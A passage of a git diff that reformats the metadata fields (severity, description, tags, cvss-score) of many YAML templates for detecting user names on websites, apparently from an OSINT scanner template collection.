metadata: max-request: 1 + tags: osint,osint-business,behance self-contained: true + http: - method: GET path: diff --git a/http/osint/bentbox.yaml b/http/osint/bentbox.yaml index 66c61639a6..3fd0b52cee 100644 --- a/http/osint/bentbox.yaml +++ b/http/osint/bentbox.yaml @@ -3,17 +3,18 @@ id: bentbox info: name: Bentbox User Name Information - Detect author: dwisiswant0 - description: Bentbox user name information check was conducted. severity: info + description: Bentbox user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,bentbox metadata: max-request: 1 + tags: osint,osint-porn,bentbox self-contained: true + http: - method: GET path: diff --git a/http/osint/biggerpockets.yaml b/http/osint/biggerpockets.yaml index 078afb6094..b6184df769 100644 --- a/http/osint/biggerpockets.yaml +++ b/http/osint/biggerpockets.yaml @@ -3,17 +3,18 @@ id: biggerpockets info: name: BiggerPockets User Name Information - Detect author: dwisiswant0 - description: BiggerPockets user name information check was conducted. severity: info + description: BiggerPockets user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,biggerpockets metadata: max-request: 1 + tags: osint,osint-finance,biggerpockets self-contained: true + http: - method: GET path: diff --git a/http/osint/bigo-live.yaml b/http/osint/bigo-live.yaml index 397492e9ff..b41bb13c56 100644 --- a/http/osint/bigo-live.yaml +++ b/http/osint/bigo-live.yaml @@ -3,17 +3,18 @@ id: bigo-live info: name: BIGO Live User Name Information - Detect author: dwisiswant0 - description: BIGO Live user name information check was conducted. severity: info + description: BIGO Live user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,bigo-live metadata: max-request: 1 + tags: osint,osint-gaming,bigo-live self-contained: true + http: - method: GET path: diff --git a/http/osint/bikemap.yaml b/http/osint/bikemap.yaml index 7d2cb1f578..f3b8ad550f 100644 --- a/http/osint/bikemap.yaml +++ b/http/osint/bikemap.yaml @@ -3,17 +3,18 @@ id: bikemap info: name: Bikemap User Name Information - Detect author: dwisiswant0 - description: Bikemap user name information check was conducted. severity: info + description: Bikemap user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,bikemap metadata: max-request: 1 + tags: osint,osint-health,bikemap self-contained: true + http: - method: GET path: diff --git a/http/osint/bimpos.yaml b/http/osint/bimpos.yaml index fbf472fb55..a46deecd55 100644 --- a/http/osint/bimpos.yaml +++ b/http/osint/bimpos.yaml @@ -3,17 +3,18 @@ id: bimpos info: name: Bimpos User Name Information - Detect author: dwisiswant0 - description: Bimpos user name information check was conducted. severity: info + description: Bimpos user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,bimpos metadata: max-request: 1 + tags: osint,osint-tech,bimpos self-contained: true + http: - method: GET path: diff --git a/http/osint/biolink.yaml b/http/osint/biolink.yaml index c2ead6650f..43e840a9da 100644 --- a/http/osint/biolink.yaml +++ b/http/osint/biolink.yaml @@ -3,17 +3,18 @@ id: biolink info: name: Biolink User Name Information - Detect author: dwisiswant0 - description: Biolink user name information check was conducted. severity: info + description: Biolink user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,biolink metadata: max-request: 1 + tags: osint,osint-misc,biolink self-contained: true + http: - method: GET path: diff --git a/http/osint/bitbucket.yaml b/http/osint/bitbucket.yaml index 6083d72036..ee916aa692 100644 --- a/http/osint/bitbucket.yaml +++ b/http/osint/bitbucket.yaml @@ -3,17 +3,18 @@ id: bitbucket info: name: Bitbucket User Name Information - Detect author: dwisiswant0 - description: Bitbucket user name information check was conducted. severity: info + description: Bitbucket user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,bitbucket metadata: max-request: 1 + tags: osint,osint-coding,bitbucket self-contained: true + http: - method: GET path: diff --git a/http/osint/bitchute.yaml b/http/osint/bitchute.yaml index e28a75c76d..e472f45248 100644 --- a/http/osint/bitchute.yaml +++ b/http/osint/bitchute.yaml @@ -3,17 +3,18 @@ id: bitchute info: name: Bitchute User Name Information - Detect author: dwisiswant0 - description: Bitchute user name information check was conducted. severity: info + description: Bitchute user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,bitchute metadata: max-request: 1 + tags: osint,osint-political,bitchute self-contained: true + http: - method: GET path: diff --git a/http/osint/bitcoin-forum.yaml b/http/osint/bitcoin-forum.yaml index f02576ccbb..dfb02940ea 100644 --- a/http/osint/bitcoin-forum.yaml +++ b/http/osint/bitcoin-forum.yaml @@ -3,17 +3,18 @@ id: bitcoin-forum info: name: Bitcoin forum User Name Information - Detect author: dwisiswant0 - description: Bitcoin forum user name information check was conducted. severity: info + description: Bitcoin forum user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,bitcoin-forum metadata: max-request: 1 + tags: osint,osint-finance,bitcoin-forum self-contained: true + http: - method: GET path: diff --git a/http/osint/bittube.yaml b/http/osint/bittube.yaml index b7cbf3a173..c34b4adbe6 100644 --- a/http/osint/bittube.yaml +++ b/http/osint/bittube.yaml @@ -3,17 +3,18 @@ id: bittube info: name: Bittube User Name Information - Detect author: dwisiswant0 - description: Bittube user name information check was conducted. severity: info + description: Bittube user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,bittube metadata: max-request: 1 + tags: osint,osint-video,bittube self-contained: true + http: - method: GET path: diff --git a/http/osint/blipfm.yaml b/http/osint/blipfm.yaml index 669cf2f4b6..f420d47ca8 100644 --- a/http/osint/blipfm.yaml +++ b/http/osint/blipfm.yaml @@ -3,17 +3,18 @@ id: blipfm info: name: BLIP.fm User Name Information - Detect author: dwisiswant0 - description: BLIP.fm user name information check was conducted. severity: info + description: BLIP.fm user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,blipfm metadata: max-request: 1 + tags: osint,osint-music,blipfm self-contained: true + http: - method: GET path: diff --git a/http/osint/blogger.yaml b/http/osint/blogger.yaml index 0dcf484ef4..8ca77c43d7 100644 --- a/http/osint/blogger.yaml +++ b/http/osint/blogger.yaml @@ -3,17 +3,18 @@ id: blogger info: name: Blogger User Name Information - Detect author: dwisiswant0 - description: Blogger user name information check was conducted. severity: info + description: Blogger user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,blogger metadata: max-request: 1 + tags: osint,osint-blog,blogger self-contained: true + http: - method: GET path: diff --git a/http/osint/blogipl.yaml b/http/osint/blogipl.yaml index 50c4da7cb6..07a7e44351 100644 --- a/http/osint/blogipl.yaml +++ b/http/osint/blogipl.yaml @@ -3,17 +3,18 @@ id: blogipl info: name: Blogi.pl User Name Information - Detect author: dwisiswant0 - description: Blogi.pl user name information check was conducted. severity: info + description: Blogi.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,blogipl metadata: max-request: 1 + tags: osint,osint-blog,blogipl self-contained: true + http: - method: GET path: diff --git a/http/osint/blogmarks.yaml b/http/osint/blogmarks.yaml index d1d420d19a..015c9daf02 100644 --- a/http/osint/blogmarks.yaml +++ b/http/osint/blogmarks.yaml @@ -3,17 +3,18 @@ id: blogmarks info: name: Blogmarks User Name Information - Detect author: dwisiswant0 - description: Blogmarks user name information check was conducted. severity: info + description: Blogmarks user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,blogmarks metadata: max-request: 1 + tags: osint,osint-misc,blogmarks self-contained: true + http: - method: GET path: diff --git a/http/osint/blogspot.yaml b/http/osint/blogspot.yaml index 63cf12d7b5..9eaa3b6c7f 100644 --- a/http/osint/blogspot.yaml +++ b/http/osint/blogspot.yaml @@ -3,17 +3,18 @@ id: blogspot info: name: Blogspot User Name Information - Detect author: dwisiswant0 - description: Blogspot user name information check was conducted. severity: info + description: Blogspot user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,blogspot metadata: max-request: 1 + tags: osint,osint-blog,blogspot self-contained: true + http: - method: GET path: diff --git a/http/osint/bodybuildingcom.yaml b/http/osint/bodybuildingcom.yaml index af9c2fcd3b..f1f98b1b7b 100644 --- a/http/osint/bodybuildingcom.yaml +++ b/http/osint/bodybuildingcom.yaml @@ -3,17 +3,18 @@ id: bodybuildingcom info: name: BodyBuilding.com User Name Information - Detect author: dwisiswant0 - description: BodyBuilding.com user name information check was conducted. severity: info + description: BodyBuilding.com user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,bodybuildingcom metadata: max-request: 1 + tags: osint,osint-health,bodybuildingcom self-contained: true + http: - method: GET path: diff --git a/http/osint/bonga-cams.yaml b/http/osint/bonga-cams.yaml index 273fbc7b72..6059b4db88 100644 --- a/http/osint/bonga-cams.yaml +++ b/http/osint/bonga-cams.yaml @@ -3,17 +3,18 @@ id: bonga-cams info: name: Bonga cams User Name Information - Detect author: dwisiswant0 - description: Bonga cams user name information check was conducted. severity: info + description: Bonga cams user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,bonga-cams metadata: max-request: 1 + tags: osint,osint-porn,bonga-cams self-contained: true + http: - method: GET path: diff --git a/http/osint/bookcrossing.yaml b/http/osint/bookcrossing.yaml index 5b0d47efc0..6c64ee236f 100644 --- a/http/osint/bookcrossing.yaml +++ b/http/osint/bookcrossing.yaml @@ -3,17 +3,18 @@ id: bookcrossing info: name: Bookcrossing User Name Information - Detect author: dwisiswant0 - description: Bookcrossing user name information check was conducted. severity: info + description: Bookcrossing user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,bookcrossing metadata: max-request: 1 + tags: osint,osint-hobby,bookcrossing self-contained: true + http: - method: GET path: diff --git a/http/osint/boosty.yaml b/http/osint/boosty.yaml index ff5b689b31..6916747422 100644 --- a/http/osint/boosty.yaml +++ b/http/osint/boosty.yaml @@ -3,17 +3,18 @@ id: boosty info: name: Boosty User Name Information - Detect author: dwisiswant0 - description: Boosty user name information check was conducted. severity: info + description: Boosty user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,boosty metadata: max-request: 1 + tags: osint,osint-social,boosty self-contained: true + http: - method: GET path: diff --git a/http/osint/booth.yaml b/http/osint/booth.yaml index f41a8a37d3..8f29c6052d 100644 --- a/http/osint/booth.yaml +++ b/http/osint/booth.yaml @@ -3,17 +3,18 @@ id: booth info: name: Booth User Name Information - Detect author: dwisiswant0 - description: Booth user name information check was conducted. severity: info + description: Booth user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,booth metadata: max-request: 1 + tags: osint,osint-shopping,booth self-contained: true + http: - method: GET path: diff --git a/http/osint/breach-forums.yaml b/http/osint/breach-forums.yaml index f71358a7a9..befb61fe6a 100644 --- a/http/osint/breach-forums.yaml +++ b/http/osint/breach-forums.yaml @@ -3,17 +3,18 @@ id: breach-forums info: name: Breach Forums User Name Information - Detect author: dwisiswant0 - description: Breach Forums user name information check was conducted. severity: info + description: Breach Forums user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,breach-forums metadata: max-request: 1 + tags: osint,osint-tech,breach-forums self-contained: true + http: - method: GET path: diff --git a/http/osint/brickset.yaml b/http/osint/brickset.yaml index 2028698d74..510be555ba 100644 --- a/http/osint/brickset.yaml +++ b/http/osint/brickset.yaml @@ -3,17 +3,18 @@ id: brickset info: name: Brickset User Name Information - Detect author: dwisiswant0 - description: Brickset user name information check was conducted. severity: info + description: Brickset user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,brickset metadata: max-request: 1 + tags: osint,osint-hobby,brickset self-contained: true + http: - method: GET path: diff --git a/http/osint/bugcrowd.yaml b/http/osint/bugcrowd.yaml index 3bb6b40e54..567fa47102 100644 --- a/http/osint/bugcrowd.yaml +++ b/http/osint/bugcrowd.yaml @@ -3,17 +3,18 @@ id: bugcrowd info: name: Bugcrowd User Name Information - Detect author: dwisiswant0 - description: Bugcrowd user name information check was conducted. severity: info + description: Bugcrowd user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,bugcrowd metadata: max-request: 1 + tags: osint,osint-tech,bugcrowd self-contained: true + http: - method: GET path: diff --git a/http/osint/bunpro.yaml b/http/osint/bunpro.yaml index 1c35111858..2e6d105315 100644 --- a/http/osint/bunpro.yaml +++ b/http/osint/bunpro.yaml @@ -3,17 +3,18 @@ id: bunpro info: name: Bunpro User Name Information - Detect author: dwisiswant0 - description: Bunpro user name information check was conducted. severity: info + description: Bunpro user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,bunpro metadata: max-request: 1 + tags: osint,osint-social,bunpro self-contained: true + http: - method: GET path: diff --git a/http/osint/buymeacoffee.yaml b/http/osint/buymeacoffee.yaml index 71bf008cf3..f80a3fdc7e 100644 --- a/http/osint/buymeacoffee.yaml +++ b/http/osint/buymeacoffee.yaml @@ -3,17 +3,18 @@ id: buymeacoffee info: name: Buymeacoffee User Name Information - Detect author: dwisiswant0 - description: Buymeacoffee user name information check was conducted. severity: info + description: Buymeacoffee user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,buymeacoffee metadata: max-request: 1 + tags: osint,osint-finance,buymeacoffee self-contained: true + http: - method: GET path: diff --git a/http/osint/buzzfeed.yaml b/http/osint/buzzfeed.yaml index 9010b83261..e21736f427 100644 --- a/http/osint/buzzfeed.yaml +++ b/http/osint/buzzfeed.yaml @@ -3,17 +3,18 @@ id: buzzfeed info: name: BuzzFeed User Name Information - Detect author: dwisiswant0 - description: BuzzFeed user name information check was conducted. severity: info + description: BuzzFeed user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,buzzfeed metadata: max-request: 1 + tags: osint,osint-social,buzzfeed self-contained: true + http: - method: GET path: diff --git a/http/osint/buzznet.yaml b/http/osint/buzznet.yaml index 13a06e4486..92c04911cf 100644 --- a/http/osint/buzznet.yaml +++ b/http/osint/buzznet.yaml @@ -3,17 +3,18 @@ id: buzznet info: name: Buzznet User Name Information - Detect author: dwisiswant0 - description: Buzznet user name information check was conducted. severity: info + description: Buzznet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,buzznet metadata: max-request: 1 + tags: osint,osint-news,buzznet self-contained: true + http: - method: GET path: diff --git a/http/osint/cafecito.yaml b/http/osint/cafecito.yaml index e01b5e7f55..4f37b4b00e 100644 --- a/http/osint/cafecito.yaml +++ b/http/osint/cafecito.yaml @@ -3,17 +3,18 @@ id: cafecito info: name: Cafecito User Name Information - Detect author: dwisiswant0 - description: Cafecito user name information check was conducted. severity: info + description: Cafecito user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,cafecito metadata: max-request: 1 + tags: osint,osint-misc,cafecito self-contained: true + http: - method: GET path: diff --git a/http/osint/cal.yaml b/http/osint/cal.yaml index f48de02330..8a2d56ea0c 100644 --- a/http/osint/cal.yaml +++ b/http/osint/cal.yaml @@ -7,13 +7,14 @@ info: description: Cal user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,cal,caldotcom metadata: max-request: 1 + tags: osint,osint-social,cal,caldotcom self-contained: true + http: - method: GET path: diff --git a/http/osint/cameo.yaml b/http/osint/cameo.yaml index 3e02ad13b4..eb0f042d5f 100644 --- a/http/osint/cameo.yaml +++ b/http/osint/cameo.yaml @@ -3,17 +3,18 @@ id: cameo info: name: Cameo User Name Information - Detect author: dwisiswant0 - description: Cameo user name information check was conducted. severity: info + description: Cameo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,cameo metadata: max-request: 1 + tags: osint,osint-shopping,cameo self-contained: true + http: - method: GET path: diff --git a/http/osint/carbonmade.yaml b/http/osint/carbonmade.yaml index aecca4f9ad..f5795ff1fb 100644 --- a/http/osint/carbonmade.yaml +++ b/http/osint/carbonmade.yaml @@ -3,17 +3,18 @@ id: carbonmade info: name: Carbonmade User Name Information - Detect author: dwisiswant0 - description: Carbonmade user name information check was conducted. severity: info + description: Carbonmade user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,carbonmade metadata: max-request: 1 + tags: osint,osint-hobby,carbonmade self-contained: true + http: - method: GET path: diff --git a/http/osint/careerhabr.yaml b/http/osint/careerhabr.yaml index a4bb813549..48b4e9b7d7 100644 --- a/http/osint/careerhabr.yaml +++ b/http/osint/careerhabr.yaml @@ -3,17 +3,18 @@ id: careerhabr info: name: Career.habr User Name Information - Detect author: dwisiswant0 - description: Career.habr user name information check was conducted. severity: info + description: Career.habr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,careerhabr metadata: max-request: 1 + tags: osint,osint-business,careerhabr self-contained: true + http: - method: GET path: diff --git a/http/osint/caringbridge.yaml b/http/osint/caringbridge.yaml index 38a086788c..8899a0e60a 100644 --- a/http/osint/caringbridge.yaml +++ b/http/osint/caringbridge.yaml @@ -3,17 +3,18 @@ id: caringbridge info: name: CaringBridge User Name Information - Detect author: dwisiswant0 - description: CaringBridge user name information check was conducted. severity: info + description: CaringBridge user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,caringbridge metadata: max-request: 1 + tags: osint,osint-health,caringbridge self-contained: true + http: - method: GET path: diff --git a/http/osint/carrdco.yaml b/http/osint/carrdco.yaml index 6ec6f165f8..fa706d9846 100644 --- a/http/osint/carrdco.yaml +++ b/http/osint/carrdco.yaml @@ -3,17 +3,18 @@ id: carrdco info: name: Carrd.co User Name Information - Detect author: dwisiswant0 - description: Carrd.co user name information check was conducted. severity: info + description: Carrd.co user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,carrdco metadata: max-request: 1 + tags: osint,osint-business,carrdco self-contained: true + http: - method: GET path: diff --git a/http/osint/cashapp.yaml b/http/osint/cashapp.yaml index 281bde9fbb..8e6d23e449 100644 --- a/http/osint/cashapp.yaml +++ b/http/osint/cashapp.yaml @@ -3,17 +3,18 @@ id: cashapp info: name: Cash.app User Name Information - Detect author: dwisiswant0 - description: Cash.app user name information check was conducted. severity: info + description: Cash.app user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,cashapp metadata: max-request: 1 + tags: osint,osint-finance,cashapp self-contained: true + http: - method: GET path: diff --git a/http/osint/castingcallclub.yaml b/http/osint/castingcallclub.yaml index e0e32d89c4..7ff70aab73 100644 --- a/http/osint/castingcallclub.yaml +++ b/http/osint/castingcallclub.yaml @@ -3,17 +3,18 @@ id: castingcallclub info: name: CastingCallClub User Name Information - Detect author: dwisiswant0 - description: CastingCallClub user name information check was conducted. severity: info + description: CastingCallClub user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,castingcallclub metadata: max-request: 1 + tags: osint,osint-hobby,castingcallclub self-contained: true + http: - method: GET path: diff --git a/http/osint/cd-action.yaml b/http/osint/cd-action.yaml index ec6ca37179..2b01f2fece 100644 --- a/http/osint/cd-action.yaml +++ b/http/osint/cd-action.yaml @@ -3,17 +3,18 @@ id: cd-action info: name: CD-Action User Name Information - Detect author: dwisiswant0 - description: CD-Action user name information check was conducted. severity: info + description: CD-Action user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,cd-action metadata: max-request: 1 + tags: osint,osint-gaming,cd-action self-contained: true + http: - method: GET path: diff --git a/http/osint/cdapl.yaml b/http/osint/cdapl.yaml index 968efde30e..59ad630b0b 100644 --- a/http/osint/cdapl.yaml +++ b/http/osint/cdapl.yaml @@ -3,17 +3,18 @@ id: cdapl info: name: Cda.pl User Name Information - Detect author: dwisiswant0 - description: Cda.pl user name information check was conducted. severity: info + description: Cda.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,cdapl metadata: max-request: 1 + tags: osint,osint-video,cdapl self-contained: true + http: - method: GET path: diff --git a/http/osint/championat.yaml b/http/osint/championat.yaml index a770ffd83d..2fdbe4d94b 100644 --- a/http/osint/championat.yaml +++ b/http/osint/championat.yaml @@ -3,17 +3,18 @@ id: championat info: name: Championat User Name Information - Detect author: dwisiswant0 - description: Championat user name information check was conducted. severity: info + description: Championat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,championat metadata: max-request: 1 + tags: osint,osint-news,championat self-contained: true + http: - method: GET path: diff --git a/http/osint/chamsko.yaml b/http/osint/chamsko.yaml index 118036bb8a..bf5fc78c05 100644 --- a/http/osint/chamsko.yaml +++ b/http/osint/chamsko.yaml @@ -3,17 +3,18 @@ id: chamsko info: name: Chamsko User Name Information - Detect author: dwisiswant0 - description: Chamsko user name information check was conducted. severity: info + description: Chamsko user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,chamsko metadata: max-request: 1 + tags: osint,osint-images,chamsko self-contained: true + http: - method: GET path: diff --git a/http/osint/chaturbate.yaml b/http/osint/chaturbate.yaml index 963842b2e3..2fa4159b87 100644 --- a/http/osint/chaturbate.yaml +++ b/http/osint/chaturbate.yaml @@ -3,17 +3,18 @@ id: chaturbate info: name: Chaturbate User Name Information - Detect author: dwisiswant0 - description: Chaturbate user name information check was conducted. severity: info + description: Chaturbate user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,chaturbate metadata: max-request: 1 + tags: osint,osint-porn,chaturbate self-contained: true + http: - method: GET path: diff --git a/http/osint/cheezburger.yaml b/http/osint/cheezburger.yaml index 9d765793d6..33e408bdb0 100644 --- a/http/osint/cheezburger.yaml +++ b/http/osint/cheezburger.yaml @@ -3,17 +3,18 @@ id: cheezburger info: name: CHEEZburger User Name Information - Detect author: dwisiswant0 - description: CHEEZburger user name information check was conducted. severity: info + description: CHEEZburger user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,cheezburger metadata: max-request: 1 + tags: osint,osint-hobby,cheezburger self-contained: true + http: - method: GET path: diff --git a/http/osint/chesscom.yaml b/http/osint/chesscom.yaml index 40b3111ece..5b44a1df53 100644 --- a/http/osint/chesscom.yaml +++ b/http/osint/chesscom.yaml @@ -3,17 +3,18 @@ id: chesscom info: name: Chess.com User Name Information - Detect author: dwisiswant0 - description: Chess.com user name information check was conducted. severity: info + description: Chess.com user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,chesscom metadata: max-request: 1 + tags: osint,osint-gaming,chesscom self-contained: true + http: - method: GET path: diff --git a/http/osint/chomikujpl.yaml b/http/osint/chomikujpl.yaml index c370146dbf..8e739fab6b 100644 --- a/http/osint/chomikujpl.yaml +++ b/http/osint/chomikujpl.yaml @@ -3,17 +3,18 @@ id: chomikujpl info: name: Chomikuj.pl User Name Information - Detect author: dwisiswant0 - description: Chomikuj.pl user name information check was conducted. severity: info + description: Chomikuj.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,chomikujpl metadata: max-request: 1 + tags: osint,osint-misc,chomikujpl self-contained: true + http: - method: GET path: diff --git a/http/osint/chyoa.yaml b/http/osint/chyoa.yaml index c74b73ee7b..8af476c285 100644 --- a/http/osint/chyoa.yaml +++ b/http/osint/chyoa.yaml @@ -3,17 +3,18 @@ id: chyoa info: name: Chyoa User Name Information - Detect author: dwisiswant0 - description: Chyoa user name information check was conducted. severity: info + description: Chyoa user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,chyoa metadata: max-request: 1 + tags: osint,osint-porn,chyoa self-contained: true + http: - method: GET path: diff --git a/http/osint/climatejusticerocks-mastodon-instance.yaml 